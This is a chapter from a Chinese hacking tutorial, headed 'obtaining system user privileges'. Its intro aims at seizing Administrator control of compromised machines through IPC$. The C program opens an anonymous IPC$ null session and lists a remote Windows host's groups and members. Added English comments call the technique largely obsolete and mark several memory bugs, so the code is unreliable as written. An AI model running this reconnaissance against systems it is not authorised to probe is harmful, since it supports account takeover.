黑客编程教程(十二)取得系统用户权限

                                          第十二节 取得系统拥护权限   我们要取得肉鸡的控制权,首先必须有Administrator权限,获得权限的途径很多都是通过IPC$破解来获得用户密码.我们看一下代码:
/*
 * Null-session enumeration of local groups and their members on a remote
 * Windows host: open an IPC$ connection with an empty user name/password,
 * list local groups via NetLocalGroupEnum, list each group's members via
 * NetLocalGroupGetMembers, then drop the connection.
 *
 * NOTE(review): this only works where the target accepts an anonymous
 * IPC$ session AND lets that session enumerate SAM groups; current Windows
 * versions deny anonymous enumeration by default (LSA RestrictAnonymous /
 * RestrictAnonymousSAM policies), and the anonymous logon is recorded in
 * the target's security log, so the listing is mainly of historical interest.
 *
 * NOTE(review): the listing as scraped has several real defects that are
 * called out inline (uninitialized wserver, double NetApiBufferFree, lost
 * group buffer, unterminated strncpy, PSID printed with %d). They are
 * documented, not fixed.
 */
#include <windows.h>
#include <stdio.h>
#include <lm.h>
#pragma comment (lib, "Mpr.lib")
#pragma comment (lib, "Netapi32.lib")

/* Enumerates local groups and members of the host named by `server`. */
void getuser(char *);

/*
 * Entry point. argv[1] is the target host name/address.
 * Exits 1 on missing argument, failed IPC$ connect or failed disconnect;
 * exits 0 otherwise. (`void main` is non-standard; `int main` is required
 * by the C standard.)
 */
void main( int argc, char *argv[ ] )
{           // empty user name and password: this is what makes it a "null session"
DWORD ret;
char username[100] = "", password[100] = "";
char server[100] = "", ipc[100] = "";
NETRESOURCE NET;   // only the four fields set below are initialized; the rest is indeterminate
if (argc == 1) { exit(1);}
// strncpy with n == sizeof server does not guarantee a terminator: an argv[1]
// of 100+ chars leaves `server` unterminated, and the sprintf below then
// reads past it and can overflow `ipc` (fixed 100 bytes, no bound check).
strncpy(server,argv[1],100); printf("server: %s\n", server);
sprintf(ipc,"\\\\%s\\ipc$",server);
NET.lpLocalName = NULL;
NET.lpProvider = NULL;
NET.dwType = RESOURCETYPE_ANY;
NET.lpRemoteName = (char*)&ipc;   // "\\<server>\ipc$"
printf("setting up session... ");
// WNetAddConnection2(resource, password, username, flags): both credential
// strings are empty here.
ret = WNetAddConnection2(&NET,(const char *)&password,(const char *)&username,0);                                                                         // establish the null session
if (ret != ERROR_SUCCESS){printf("IPC$ connect fail.\n");exit(1);}
else printf("IPC$ connect success.\n");
getuser((char*)&server);
printf("Disconnect Server... ");
ret = WNetCancelConnection2((char*)&ipc,0,TRUE);                     // disconnect the IPC$ session (TRUE = force even if in use)
if (ret != ERROR_SUCCESS){printf("fail.\n");exit(1);}
else printf("success.\n");
exit (0);
}

/*
 * Lists every local group on the remote host and, for each group, its
 * members (domain\name, SID, SID usage). Output goes to stdout; errors are
 * reported as "fail" and the enumeration stops.
 *
 * BUG: `server` (the parameter) is never used. `wserver` is declared but
 * never filled in, so NetLocalGroupEnum / NetLocalGroupGetMembers receive an
 * uninitialized wide string (undefined behavior; whatever host the API
 * resolves that garbage to is not necessarily `server`).
 */
void getuser(char *server)                      // function that retrieves the users
{
DWORD ret, read, total, resume = 0;   // resume handle must start at 0 for the first NetLocalGroupEnum call
int i;                                // compared against DWORD `read` below: signed/unsigned comparison
LPVOID buff;
char comment[255];
wchar_t wserver[100];                 // BUG: never initialized from `server` (see function comment)
do {
// MAX_PREFERRED_LENGTH: let the API allocate a buffer big enough for all
// groups; `buff` is then owned by us and must be released with NetApiBufferFree.
ret = NetLocalGroupEnum(wserver, 1, (unsigned char **)&buff, MAX_PREFERRED_LENGTH, &read, &total, &resume);
if (ret != NERR_Success && ret != ERROR_MORE_DATA) {printf("fail\n");break;}
PLOCALGROUP_INFO_1 info = (PLOCALGROUP_INFO_1) buff;   // level 1: name + comment per group
for (i=0; i<read; i++) {
printf("GROUP: %S\n",info[i].lgrpi1_name);   // %S = wide string with the narrow printf family (MSVC extension)
// Narrow the comment into a fixed 255-byte buffer; return value (and thus
// truncation/failure) is not checked, so `comment` may be stale on failure.
WideCharToMultiByte(CP_ACP, 0, info[i].lgrpi1_comment , -1, comment,255,NULL,NULL);
printf("\tCOMMENT: %s\n",comment);
// These shadow the outer ret/read/total/resume for the member query only.
DWORD ret, read, total, resume = 0;
// BUG: this reuses the outer `buff`, so the pointer to the group buffer
// (still referenced through `info`) is overwritten and that buffer is never
// freed. 1024 is a preferred maximum length in bytes; a larger member list
// returns ERROR_MORE_DATA, which is accepted below but the remainder is
// never fetched (the inner resume handle is not looped on), so members
// past that point are silently dropped.
ret = NetLocalGroupGetMembers((const unsigned short*)&wserver, info[i].lgrpi1_name, 2, (unsigned char **)&buff, 1024, &read, &total, &resume);
if (ret != NERR_Success && ret != ERROR_MORE_DATA) {printf("fail\n");break;}   // `break` only leaves this for loop, not the do/while
PLOCALGROUP_MEMBERS_INFO_2 info = (PLOCALGROUP_MEMBERS_INFO_2) buff;   // level 2: SID, usage, domain\name; shadows the outer `info`
for (unsigned i=0; i<read; i++) {
printf("\t\t%S\n", info[i].lgrmi2_domainandname);
// BUG: lgrmi2_sid is a PSID (pointer to a variable-length SID structure),
// not an integer; printing it with %d is a format/argument mismatch and
// shows a pointer value, not the SID. Converting it to its string form
// (S-1-5-...) needs a dedicated SID-to-string conversion.
printf("\t\t\tSID:%d\n", info[i].lgrmi2_sid);
printf("\t\t\tSIDUSAGE:%d\n",info[i].lgrmi2_sidusage);   // SID_NAME_USE enum value, printed numerically
}
NetApiBufferFree (buff);   // frees the member buffer; `buff` keeps the now-dangling value
}
// BUG: if at least one group was processed, `buff` still holds the member
// buffer freed on the last iteration, so this is a double free; the group
// buffer allocated by NetLocalGroupEnum is leaked instead.
NetApiBufferFree (buff);
} while (ret == ERROR_MORE_DATA );   // outer `ret`: keep paging through groups while the API reports more data
}